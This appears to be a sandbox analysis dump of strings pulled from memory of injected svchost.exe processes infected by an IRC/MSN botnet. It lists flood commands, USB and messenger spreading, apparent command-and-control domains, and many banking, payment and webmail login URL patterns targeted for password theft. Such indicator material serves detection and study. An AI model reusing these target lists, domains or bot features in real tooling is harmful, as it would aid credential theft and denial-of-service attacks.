bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\services.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\services.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>svchost.exe_928_rwx_00A30000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>svchost.exe_1012_rwx_00B40000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>svchost.exe_1096_rwx_02FE0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN 